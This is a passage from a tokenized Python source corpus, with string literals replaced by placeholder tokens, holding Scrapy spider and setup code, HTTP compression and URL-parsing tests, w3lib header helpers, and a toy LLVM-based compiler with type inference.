from_crawler ( crawler , * args , ** kwargs ) <EOL> spider . _follow_links = crawler . settings . getbool ( <EOL> '<STR_LIT>' , True ) <EOL> return spider <EOL> def set_crawler ( self , crawler ) : <EOL> super ( CrawlSpider , self ) . set_crawler ( crawler ) <EOL> self . _follow_links = crawler . settings . getbool ( '<STR_LIT>' , True ) </s>
<s> """<STR_LIT>""" <EOL> from w3lib . html import * </s>
<s> from os . path import dirname , join <EOL> from setuptools import setup , find_packages <EOL> with open ( join ( dirname ( __file__ ) , '<STR_LIT>' ) , '<STR_LIT:rb>' ) as f : <EOL> version = f . read ( ) . decode ( '<STR_LIT:ascii>' ) . strip ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> url = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> author = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from io import BytesIO <EOL> from unittest import TestCase <EOL> from os . path import join , abspath , dirname <EOL> from gzip import GzipFile <EOL> from scrapy . spiders import Spider <EOL> from scrapy . http import Response , Request , HtmlResponse <EOL> from scrapy . downloadermiddlewares . httpcompression import HttpCompressionMiddleware <EOL> from tests import tests_datadir <EOL> from w3lib . encoding import resolve_encoding <EOL> SAMPLEDIR = join ( tests_datadir , '<STR_LIT>' ) <EOL> FORMAT = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> class HttpCompressionTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . spider = Spider ( '<STR_LIT:foo>' ) <EOL> self . mw = HttpCompressionMiddleware ( ) <EOL> def _getresponse ( self , coding ) : <EOL> if coding not in FORMAT : <EOL> raise ValueError ( ) <EOL> samplefile , contentencoding = FORMAT [ coding ] <EOL> with open ( join ( SAMPLEDIR , samplefile ) , '<STR_LIT:rb>' ) as sample : <EOL> body = sample . read ( ) <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : len ( body ) , <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : contentencoding , <EOL> } <EOL> response = Response ( '<STR_LIT>' , body = body , headers = headers ) <EOL> response . request = Request ( '<STR_LIT>' , headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return response <EOL> def test_process_request ( self ) : <EOL> request = Request ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in request . headers <EOL> self . mw . process_request ( request , self . spider ) <EOL> self . assertEqual ( request . headers . get ( '<STR_LIT>' ) , b'<STR_LIT>' ) <EOL> def test_process_response_gzip ( self ) : <EOL> response = self . _getresponse ( '<STR_LIT>' ) <EOL> request = response . request <EOL> self . assertEqual ( response . headers [ '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert newresponse is not response <EOL> assert newresponse . body . startswith ( b'<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in newresponse . headers <EOL> def test_process_response_rawdeflate ( self ) : <EOL> response = self . _getresponse ( '<STR_LIT>' ) <EOL> request = response . request <EOL> self . assertEqual ( response . headers [ '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert newresponse is not response <EOL> assert newresponse . body . startswith ( b'<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in newresponse . headers <EOL> def test_process_response_zlibdelate ( self ) : <EOL> response = self . _getresponse ( '<STR_LIT>' ) <EOL> request = response . request <EOL> self . assertEqual ( response . headers [ '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert newresponse is not response <EOL> assert newresponse . body . startswith ( b'<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in newresponse . headers <EOL> def test_process_response_plain ( self ) : <EOL> response = Response ( '<STR_LIT>' , body = b'<STR_LIT>' ) <EOL> request = Request ( '<STR_LIT>' ) <EOL> assert not response . headers . get ( '<STR_LIT>' ) <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert newresponse is response <EOL> assert newresponse . body . startswith ( b'<STR_LIT>' ) <EOL> def test_multipleencodings ( self ) : <EOL> response = self . _getresponse ( '<STR_LIT>' ) <EOL> response . headers [ '<STR_LIT>' ] = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> request = response . request <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert newresponse is not response <EOL> self . assertEqual ( newresponse . headers . getlist ( '<STR_LIT>' ) , [ b'<STR_LIT>' ] ) <EOL> def test_process_response_encoding_inside_body ( self ) : <EOL> headers = { <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> f = BytesIO ( ) <EOL> plainbody = b"""<STR_LIT>""" <EOL> zf = GzipFile ( fileobj = f , mode = '<STR_LIT:wb>' ) <EOL> zf . write ( plainbody ) <EOL> zf . close ( ) <EOL> response = Response ( "<STR_LIT>" , headers = headers , body = f . getvalue ( ) ) <EOL> request = Request ( "<STR_LIT>" ) <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert isinstance ( newresponse , HtmlResponse ) <EOL> self . assertEqual ( newresponse . body , plainbody ) <EOL> self . assertEqual ( newresponse . encoding , resolve_encoding ( '<STR_LIT>' ) ) <EOL> def test_process_response_force_recalculate_encoding ( self ) : <EOL> headers = { <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> f = BytesIO ( ) <EOL> plainbody = b"""<STR_LIT>""" <EOL> zf = GzipFile ( fileobj = f , mode = '<STR_LIT:wb>' ) <EOL> zf . write ( plainbody ) <EOL> zf . close ( ) <EOL> response = HtmlResponse ( "<STR_LIT>" , headers = headers , body = f . getvalue ( ) ) <EOL> request = Request ( "<STR_LIT>" ) <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert isinstance ( newresponse , HtmlResponse ) <EOL> self . assertEqual ( newresponse . body , plainbody ) <EOL> self . assertEqual ( newresponse . encoding , resolve_encoding ( '<STR_LIT>' ) ) <EOL> def test_process_response_gzipped_contenttype ( self ) : <EOL> response = self . _getresponse ( '<STR_LIT>' ) <EOL> response . headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> request = response . request <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> self . assertIs ( newresponse , response ) <EOL> self . assertEqual ( response . headers [ '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> self . assertEqual ( response . headers [ '<STR_LIT:Content-Type>' ] , b'<STR_LIT>' ) </s>
<s> import unittest <EOL> from six . moves . urllib . parse import urlparse <EOL> from scrapy . http import Request <EOL> from scrapy . utils . httpobj import urlparse_cached <EOL> class HttpobjUtilsTest ( unittest . TestCase ) : <EOL> def test_urlparse_cached ( self ) : <EOL> url = "<STR_LIT>" <EOL> request1 = Request ( url ) <EOL> request2 = Request ( url ) <EOL> req1a = urlparse_cached ( request1 ) <EOL> req1b = urlparse_cached ( request1 ) <EOL> req2 = urlparse_cached ( request2 ) <EOL> urlp = urlparse ( url ) <EOL> assert req1a == req2 <EOL> assert req1a == urlp <EOL> assert req1a is req1b <EOL> assert req1a is not req2 <EOL> assert req1a is not req2 <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from base64 import urlsafe_b64encode <EOL> def headers_raw_to_dict ( headers_raw ) : <EOL> r"""<STR_LIT>""" <EOL> if headers_raw is None : <EOL> return None <EOL> headers = headers_raw . splitlines ( ) <EOL> headers_tuples = [ header . split ( b'<STR_LIT::>' , <NUM_LIT:1> ) for header in headers ] <EOL> return dict ( [ <EOL> ( header_item [ <NUM_LIT:0> ] . strip ( ) , [ header_item [ <NUM_LIT:1> ] . strip ( ) ] ) <EOL> for header_item in headers_tuples <EOL> if len ( header_item ) == <NUM_LIT:2> <EOL> ] ) <EOL> def headers_dict_to_raw ( headers_dict ) : <EOL> r"""<STR_LIT>""" <EOL> if headers_dict is None : <EOL> return None <EOL> raw_lines = [ ] <EOL> for key , value in headers_dict . items ( ) : <EOL> if isinstance ( value , bytes ) : <EOL> raw_lines . append ( b"<STR_LIT>" . join ( [ key , value ] ) ) <EOL> elif isinstance ( value , ( list , tuple ) ) : <EOL> for v in value : <EOL> raw_lines . append ( b"<STR_LIT>" . join ( [ key , v ] ) ) <EOL> return b'<STR_LIT:\r\n>' . join ( raw_lines ) <EOL> def basic_auth_header ( username , password ) : <EOL> """<STR_LIT>""" <EOL> auth = "<STR_LIT>" % ( username , password ) <EOL> if not isinstance ( auth , bytes ) : <EOL> auth = auth . encode ( '<STR_LIT>' ) <EOL> return b'<STR_LIT>' + urlsafe_b64encode ( auth ) </s>
<s> from __future__ import print_function <EOL> import sys <EOL> import ast <EOL> import types <EOL> import ctypes <EOL> import inspect <EOL> import pprint <EOL> import string <EOL> import numpy as np <EOL> from itertools import tee , izip <EOL> from textwrap import dedent <EOL> from collections import deque , defaultdict <EOL> import llvm . core as lc <EOL> import llvm . passes as lp <EOL> import llvm . ee as le <EOL> from llvm . core import Module , Builder , Function , Type , Constant <EOL> DEBUG = False <EOL> class Var ( ast . AST ) : <EOL> _fields = [ "<STR_LIT:id>" , "<STR_LIT:type>" ] <EOL> def __init__ ( self , id , type = None ) : <EOL> self . id = id <EOL> self . type = type <EOL> class Assign ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:type>" ] <EOL> def __init__ ( self , ref , val , type = None ) : <EOL> self . ref = ref <EOL> self . val = val <EOL> self . type = type <EOL> class Return ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" ] <EOL> def __init__ ( self , val ) : <EOL> self . val = val <EOL> class Loop ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:end>" , "<STR_LIT:body>" ] <EOL> def __init__ ( self , var , begin , end , body ) : <EOL> self . var = var <EOL> self . begin = begin <EOL> self . end = end <EOL> self . body = body <EOL> class App ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" , "<STR_LIT:args>" ] <EOL> def __init__ ( self , fn , args ) : <EOL> self . fn = fn <EOL> self . args = args <EOL> class Fun ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" , "<STR_LIT:args>" , "<STR_LIT:body>" ] <EOL> def __init__ ( self , fname , args , body ) : <EOL> self . fname = fname <EOL> self . args = args <EOL> self . body = body <EOL> class LitInt ( ast . AST ) : <EOL> _fields = [ "<STR_LIT:n>" ] <EOL> def __init__ ( self , n , type = None ) : <EOL> self . n = n <EOL> self . type = type <EOL> class LitFloat ( ast . AST ) : <EOL> _fields = [ "<STR_LIT:n>" ] <EOL> def __init__ ( self , n , type = None ) : <EOL> self . n = n <EOL> self . type = None <EOL> class LitBool ( ast . AST ) : <EOL> _fields = [ "<STR_LIT:n>" ] <EOL> def __init__ ( self , n ) : <EOL> self . n = n <EOL> class Prim ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" , "<STR_LIT:args>" ] <EOL> def __init__ ( self , fn , args ) : <EOL> self . fn = fn <EOL> self . args = args <EOL> class Index ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def __init__ ( self , val , ix ) : <EOL> self . val = val <EOL> self . ix = ix <EOL> class Noop ( ast . AST ) : <EOL> _fields = [ ] <EOL> primops = { ast . Add : "<STR_LIT>" , ast . Mult : "<STR_LIT>" } <EOL> class TVar ( object ) : <EOL> def __init__ ( self , s ) : <EOL> self . s = s <EOL> def __hash__ ( self ) : <EOL> return hash ( self . s ) <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , TVar ) : <EOL> return ( self . s == other . s ) <EOL> else : <EOL> return False <EOL> def __str__ ( self ) : <EOL> return self . s <EOL> class TCon ( object ) : <EOL> def __init__ ( self , s ) : <EOL> self . s = s <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , TCon ) : <EOL> return ( self . s == other . s ) <EOL> else : <EOL> return False <EOL> def __hash__ ( self ) : <EOL> return hash ( self . s ) <EOL> def __str__ ( self ) : <EOL> return self . s <EOL> class TApp ( object ) : <EOL> def __init__ ( self , a , b ) : <EOL> self . a = a <EOL> self . b = b <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , TApp ) : <EOL> return ( self . a == other . a ) & ( self . b == other . b ) <EOL> else : <EOL> return False <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . a , self . b ) ) <EOL> def __str__ ( self ) : <EOL> return str ( self . a ) + "<STR_LIT:U+0020>" + str ( self . b ) <EOL> class TFun ( object ) : <EOL> def __init__ ( self , argtys , retty ) : <EOL> assert isinstance ( argtys , list ) <EOL> self . argtys = argtys <EOL> self . retty = retty <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , TFun ) : <EOL> return ( self . argtys == other . argtys ) & ( self . retty == other . retty ) <EOL> else : <EOL> return False <EOL> def __str__ ( self ) : <EOL> return str ( self . argtys ) + "<STR_LIT>" + str ( self . retty ) <EOL> def ftv ( x ) : <EOL> if isinstance ( x , TCon ) : <EOL> return set ( ) <EOL> elif isinstance ( x , TApp ) : <EOL> return ftv ( x . a ) | ftv ( x . b ) <EOL> elif isinstance ( x , TFun ) : <EOL> return reduce ( set . union , map ( ftv , x . argtys ) ) | ftv ( x . retty ) <EOL> elif isinstance ( x , TVar ) : <EOL> return set ( [ x ] ) <EOL> def is_array ( ty ) : <EOL> return isinstance ( ty , TApp ) and ty . a == TCon ( "<STR_LIT>" ) <EOL> int32 = TCon ( "<STR_LIT>" ) <EOL> int64 = TCon ( "<STR_LIT>" ) <EOL> float32 = TCon ( "<STR_LIT>" ) <EOL> double64 = TCon ( "<STR_LIT>" ) <EOL> void = TCon ( "<STR_LIT>" ) <EOL> array = lambda t : TApp ( TCon ( "<STR_LIT>" ) , t ) <EOL> array_int32 = array ( int32 ) <EOL> array_int64 = array ( int64 ) <EOL> array_double64 = array ( double64 ) <EOL> def naming ( ) : <EOL> k = <NUM_LIT:0> <EOL> while True : <EOL> for a in string . ascii_lowercase : <EOL> yield ( "<STR_LIT:'>" + a + str ( k ) ) if ( k > <NUM_LIT:0> ) else ( a ) <EOL> k = k + <NUM_LIT:1> <EOL> class TypeInfer ( object ) : <EOL> def __init__ ( self ) : <EOL> self . constraints = [ ] <EOL> self . env = { } <EOL> self . names = naming ( ) <EOL> def fresh ( self ) : <EOL> return TVar ( '<STR_LIT:$>' + next ( self . names ) ) <EOL> def visit ( self , node ) : <EOL> name = "<STR_LIT>" % type ( node ) . __name__ <EOL> if hasattr ( self , name ) : <EOL> return getattr ( self , name ) ( node ) <EOL> else : <EOL> return self . generic_visit ( node ) <EOL> def visit_Fun ( self , node ) : <EOL> arity = len ( node . args ) <EOL> self . argtys = [ self . fresh ( ) for v in node . args ] <EOL> self . retty = TVar ( "<STR_LIT>" ) <EOL> for ( arg , ty ) in zip ( node . args , self . argtys ) : <EOL> arg . type = ty <EOL> self . env [ arg . id ] = ty <EOL> map ( self . visit , node . body ) <EOL> return TFun ( self . argtys , self . retty ) <EOL> def visit_Noop ( self , node ) : <EOL> return None <EOL> def visit_LitInt ( self , node ) : <EOL> tv = self . fresh ( ) <EOL> node . type = tv <EOL> return tv <EOL> def visit_LitFloat ( self , node ) : <EOL> tv = self . fresh ( ) <EOL> node . type = tv <EOL> return tv <EOL> def visit_Assign ( self , node ) : <EOL> ty = self . visit ( node . val ) <EOL> if node . ref in self . env : <EOL> self . constraints += [ ( ty , self . env [ node . ref ] ) ] <EOL> self . env [ node . ref ] = ty <EOL> node . type = ty <EOL> return None <EOL> def visit_Index ( self , node ) : <EOL> tv = self . fresh ( ) <EOL> ty = self . visit ( node . val ) <EOL> ixty = self . visit ( node . ix ) <EOL> self . constraints += [ ( ty , array ( tv ) ) , ( ixty , int32 ) ] <EOL> return tv <EOL> def visit_Prim ( self , node ) : <EOL> if node . fn == "<STR_LIT>" : <EOL> return array ( int32 ) <EOL> elif node . fn == "<STR_LIT>" : <EOL> tya = self . visit ( node . args [ <NUM_LIT:0> ] ) <EOL> tyb = self . visit ( node . args [ <NUM_LIT:1> ] ) <EOL> self . constraints += [ ( tya , tyb ) ] <EOL> return tyb <EOL> elif node . fn == "<STR_LIT>" : <EOL> tya = self . visit ( node . args [ <NUM_LIT:0> ] ) <EOL> tyb = self . visit ( node . args [ <NUM_LIT:1> ] ) <EOL> self . constraints += [ ( tya , tyb ) ] <EOL> return tyb <EOL> else : <EOL> raise NotImplementedError <EOL> def visit_Var ( self , node ) : <EOL> ty = self . env [ node . id ] <EOL> node . type = ty <EOL> return ty <EOL> def visit_Return ( self , node ) : <EOL> ty = self . visit ( node . val ) <EOL> self . constraints += [ ( ty , self . retty ) ] <EOL> def visit_Loop ( self , node ) : <EOL> self . env [ node . var . id ] = int32 <EOL> varty = self . visit ( node . var ) <EOL> begin = self . visit ( node . begin ) <EOL> end = self . visit ( node . end ) <EOL> self . constraints += [ ( varty , int32 ) , ( <EOL> begin , int64 ) , ( end , int32 ) ] <EOL> map ( self . visit , node . body ) <EOL> def generic_visit ( self , node ) : <EOL> raise NotImplementedError <EOL> class UnderDeteremined ( Exception ) : <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" <EOL> class InferError ( Exception ) : <EOL> def __init__ ( self , ty1 , ty2 ) : <EOL> self . ty1 = ty1 <EOL> self . ty2 = ty2 <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT:\n>' . join ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:\t>" + str ( self . ty1 ) , <EOL> "<STR_LIT>" , "<STR_LIT:\t>" + str ( self . ty2 ) <EOL> ] ) <EOL> def empty ( ) : <EOL> return { } <EOL> def apply ( s , t ) : <EOL> if isinstance ( t , TCon ) : <EOL> return t <EOL> elif isinstance ( t , TApp ) : <EOL> return TApp ( apply ( s , t . a ) , apply ( s , t . b ) ) <EOL> elif isinstance ( t , TFun ) : <EOL> argtys = [ apply ( s , a ) for a in t . argtys ] <EOL> retty = apply ( s , t . retty ) <EOL> return TFun ( argtys , retty ) <EOL> elif isinstance ( t , TVar ) : <EOL> return s . get ( t . s , t ) <EOL> def applyList ( s , xs ) : <EOL> return [ ( apply ( s , x ) , apply ( s , y ) ) for ( x , y ) in xs ] <EOL> def unify ( x , y ) : <EOL> if isinstance ( x , TApp ) and isinstance ( y , TApp ) : <EOL> s1 = unify ( x . a , y . a ) <EOL> s2 = unify ( apply ( s1 , x . b ) , apply ( s1 , y . b ) ) <EOL> return compose ( s2 , s1 ) <EOL> elif isinstance ( x , TCon ) and isinstance ( y , TCon ) and ( x == y ) : <EOL> return empty ( ) <EOL> elif isinstance ( x , TFun ) and isinstance ( y , TFun ) : <EOL> if len ( x . argtys ) != len ( y . argtys ) : <EOL> return Exception ( "<STR_LIT>" ) <EOL> s1 = solve ( zip ( x . argtys , y . argtys ) ) <EOL> s2 = unify ( apply ( s1 , x . retty ) , apply ( s1 , y . retty ) ) <EOL> return compose ( s2 , s1 ) <EOL> elif isinstance ( x , TVar ) : <EOL> return bind ( x . s , y ) <EOL> elif isinstance ( y , TVar ) : <EOL> return bind ( y . s , x ) <EOL> else : <EOL> raise InferError ( x , y ) <EOL> def solve ( xs ) : <EOL> mgu = empty ( ) <EOL> cs = deque ( xs ) <EOL> while len ( cs ) : <EOL> ( a , b ) = cs . pop ( ) <EOL> s = unify ( a , b ) <EOL> mgu = compose ( s , mgu ) <EOL> cs = deque ( applyList ( s , cs ) ) <EOL> return mgu <EOL> def bind ( n , x ) : <EOL> if x == n : <EOL> return empty ( ) <EOL> elif occurs_check ( n , x ) : <EOL> raise InfiniteType ( n , x ) <EOL> else : <EOL> return dict ( [ ( n , x ) ] ) <EOL> def occurs_check ( n , x ) : <EOL> return n in ftv ( x ) <EOL> def union ( s1 , s2 ) : <EOL> nenv = s1 . copy ( ) <EOL> nenv . update ( s2 ) <EOL> return nenv <EOL> def compose ( s1 , s2 ) : <EOL> s3 = dict ( ( t , apply ( s1 , u ) ) for t , u in s2 . items ( ) ) <EOL> return union ( s1 , s3 ) <EOL> class PythonVisitor ( ast . NodeVisitor ) : <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __call__ ( self , source ) : <EOL> if isinstance ( source , types . ModuleType ) : <EOL> source = dedent ( inspect . getsource ( source ) ) <EOL> if isinstance ( source , types . FunctionType ) : <EOL> source = dedent ( inspect . getsource ( source ) ) <EOL> if isinstance ( source , types . LambdaType ) : <EOL> source = dedent ( inspect . getsource ( source ) ) <EOL> elif isinstance ( source , ( str , unicode ) ) : <EOL> source = dedent ( source ) <EOL> else : <EOL> raise NotImplementedError <EOL> self . _source = source <EOL> self . _ast = ast . parse ( source ) <EOL> return self . visit ( self . _ast ) <EOL> def visit_Module ( self , node ) : <EOL> body = map ( self . visit , node . body ) <EOL> return body [ <NUM_LIT:0> ] <EOL> def visit_Name ( self , node ) : <EOL> return Var ( node . id ) <EOL> def visit_Num ( self , node ) : <EOL> if isinstance ( node . n , float ) : <EOL> return LitFloat ( node . n ) <EOL> else : <EOL> return LitInt ( node . n ) <EOL> def visit_Bool ( self , node ) : <EOL> return LitBool ( node . n ) <EOL> def visit_Call ( self , node ) : <EOL> name = self . visit ( node . func ) <EOL> args = map ( self . visit , node . args ) <EOL> keywords = map ( self . visit , node . keywords ) <EOL> return App ( name , args ) <EOL> def visit_BinOp ( self , node ) : <EOL> op_str = node . op . __class__ <EOL> a = self . visit ( node . left ) <EOL> b = self . visit ( node . right ) <EOL> opname = primops [ op_str ] <EOL> return Prim ( opname , [ a , b ] ) <EOL> def visit_Assign ( self , node ) : <EOL> targets = node . targets <EOL> assert len ( node . targets ) == <NUM_LIT:1> <EOL> var = node . targets [ <NUM_LIT:0> ] . id <EOL> val = self . visit ( node . value ) <EOL> return Assign ( var , val ) <EOL> def visit_FunctionDef ( self , node ) : <EOL> stmts = list ( node . body ) <EOL> stmts = map ( self . visit , stmts ) <EOL> args = map ( self . visit , node . args . args ) <EOL> res = Fun ( node . name , args , stmts ) <EOL> return res <EOL> def visit_Pass ( self , node ) : <EOL> return Noop ( ) <EOL> def visit_Return ( self , node ) : <EOL> val = self . visit ( node . value ) <EOL> return Return ( val ) <EOL> def visit_Attribute ( self , node ) : <EOL> if node . attr == "<STR_LIT>" : <EOL> val = self . visit ( node . value ) <EOL> return Prim ( "<STR_LIT>" , [ val ] ) <EOL> else : <EOL> raise NotImplementedError <EOL> def visit_Subscript ( self , node ) : <EOL> if isinstance ( node . ctx , ast . Load ) : <EOL> if node . slice : <EOL> val = self . visit ( node . value ) <EOL> ix = self . visit ( node . slice . value ) <EOL> return Index ( val , ix ) <EOL> elif isinstance ( node . ctx , ast . Store ) : <EOL> raise NotImplementedError <EOL> def visit_For ( self , node ) : <EOL> target = self . visit ( node . target ) <EOL> stmts = map ( self . visit , node . body ) <EOL> if node . iter . func . id in { "<STR_LIT>" , "<STR_LIT>" } : <EOL> args = map ( self . visit , node . iter . args ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if len ( args ) == <NUM_LIT:1> : <EOL> return Loop ( target , LitInt ( <NUM_LIT:0> , type = int32 ) , args [ <NUM_LIT:0> ] , stmts ) <EOL> elif len ( args ) == <NUM_LIT:2> : <EOL> return Loop ( target , args [ <NUM_LIT:0> ] , args [ <NUM_LIT:1> ] , stmts ) <EOL> def visit_AugAssign ( self , node ) : <EOL> if isinstance ( node . op , ast . Add ) : <EOL> ref = node . target . id <EOL> value = self . visit ( node . value ) <EOL> return Assign ( ref , Prim ( "<STR_LIT>" , [ Var ( ref ) , value ] ) ) <EOL> if isinstance ( node . op , ast . Mul ) : <EOL> ref = node . target . id <EOL> value = self . visit ( node . value ) <EOL> return Assign ( ref , Prim ( "<STR_LIT>" , [ Var ( ref ) , value ] ) ) <EOL> else : <EOL> raise NotImplementedError <EOL> def generic_visit ( self , node ) : <EOL> raise NotImplementedError <EOL> def ast2tree ( node , include_attrs = True ) : <EOL> def _transform ( node ) : <EOL> if isinstance ( node , ast . AST ) : <EOL> fields = ( ( a , _transform ( b ) ) <EOL> for a , b in ast . iter_fields ( node ) ) <EOL> if include_attrs : <EOL> attrs = ( ( a , _transform ( getattr ( node , a ) ) ) <EOL> for a in node . _attributes <EOL> if hasattr ( node , a ) ) <EOL> return ( node . __class__ . __name__ , dict ( fields ) , dict ( attrs ) ) <EOL> return ( node . __class__ . __name__ , dict ( fields ) ) <EOL> elif isinstance ( node , list ) : <EOL> return [ _transform ( x ) for x in node ] <EOL> elif isinstance ( node , str ) : <EOL> return repr ( node ) <EOL> return node <EOL> if not isinstance ( node , ast . AST ) : <EOL> raise TypeError ( '<STR_LIT>' % node . __class__ . __name__ ) <EOL> return _transform ( node ) <EOL> def pformat_ast ( node , include_attrs = False , ** kws ) : <EOL> return pprint . pformat ( ast2tree ( node , include_attrs ) , ** kws ) <EOL> def dump ( node ) : <EOL> return pformat_ast ( node ) <EOL> pointer = Type . pointer <EOL> int_type = Type . int ( ) <EOL> float_type = Type . float ( ) <EOL> double_type = Type . double ( ) <EOL> bool_type = Type . int ( <NUM_LIT:1> ) <EOL> void_type = Type . void ( ) <EOL> void_ptr = pointer ( Type . int ( <NUM_LIT:8> ) ) <EOL> def array_type ( elt_type ) : <EOL> return Type . struct ( [ <EOL> pointer ( elt_type ) , <EOL> int_type , <EOL> pointer ( int_type ) , <EOL> ] , name = '<STR_LIT>' + str ( elt_type ) ) <EOL> int32_array = pointer ( array_type ( int_type ) ) <EOL> int64_array = pointer ( array_type ( Type . int ( <NUM_LIT:64> ) ) ) <EOL> double_array = pointer ( array_type ( double_type ) ) <EOL> lltypes_map = { <EOL> int32 : int_type , <EOL> int64 : int_type , <EOL> float32 : float_type , <EOL> double64 : double_type , <EOL> array_int32 : int32_array , <EOL> array_int64 : int64_array , <EOL> array_double64 : double_array <EOL> } <EOL> def to_lltype ( ptype ) : <EOL> return lltypes_map [ ptype ] <EOL> def determined ( ty ) : <EOL> return len ( ftv ( ty ) ) == <NUM_LIT:0> <EOL> class LLVMEmitter ( object ) : <EOL> def __init__ ( self , spec_types , retty , argtys ) : <EOL> self . function = None <EOL> self . builder = None <EOL> self . locals = { } <EOL> self . arrays = defaultdict ( dict ) <EOL> self . exit_block = None <EOL> self . spec_types = spec_types <EOL> self . retty = retty <EOL> self . argtys = argtys <EOL> def start_function ( self , name , module , rettype , argtypes ) : <EOL> func_type = lc . Type . function ( rettype , argtypes , False ) <EOL> function = lc . Function . new ( module , func_type , name ) <EOL> entry_block = function . append_basic_block ( "<STR_LIT>" ) <EOL> builder = lc . Builder . new ( entry_block ) <EOL> self . exit_block = function . append_basic_block ( "<STR_LIT>" ) <EOL> self . function = function <EOL> self . builder = builder <EOL> def end_function ( self ) : <EOL> self . builder . position_at_end ( self . exit_block ) <EOL> if '<STR_LIT>' in self . locals : <EOL> retval = self . builder . load ( self . locals [ '<STR_LIT>' ] ) <EOL> self . builder . ret ( retval ) <EOL> else : <EOL> self . builder . ret_void ( ) <EOL> def add_block ( self , name ) : <EOL> return self . function . append_basic_block ( name ) <EOL> def set_block ( self , block ) : <EOL> self . block = block <EOL> self . builder . position_at_end ( block ) <EOL> def cbranch ( self , cond , true_block , false_block ) : <EOL> self . builder . cbranch ( cond , true_block , false_block ) <EOL> def branch ( self , next_block ) : <EOL> self . builder . branch ( next_block ) <EOL> def specialize ( self , val ) : <EOL> if isinstance ( val . type , TVar ) : <EOL> return to_lltype ( self . spec_types [ val . type . s ] ) <EOL> else : <EOL> return val . type <EOL> def const ( self , val ) : <EOL> if isinstance ( val , ( int , long ) ) : <EOL> return Constant . int ( int_type , val ) <EOL> elif isinstance ( val , float ) : <EOL> return Constant . real ( double_type , val ) <EOL> elif isinstance ( val , bool ) : <EOL> return Constant . int ( bool_type , int ( val ) ) <EOL> elif isinstance ( val , str ) : <EOL> return Constant . stringz ( val ) <EOL> else : 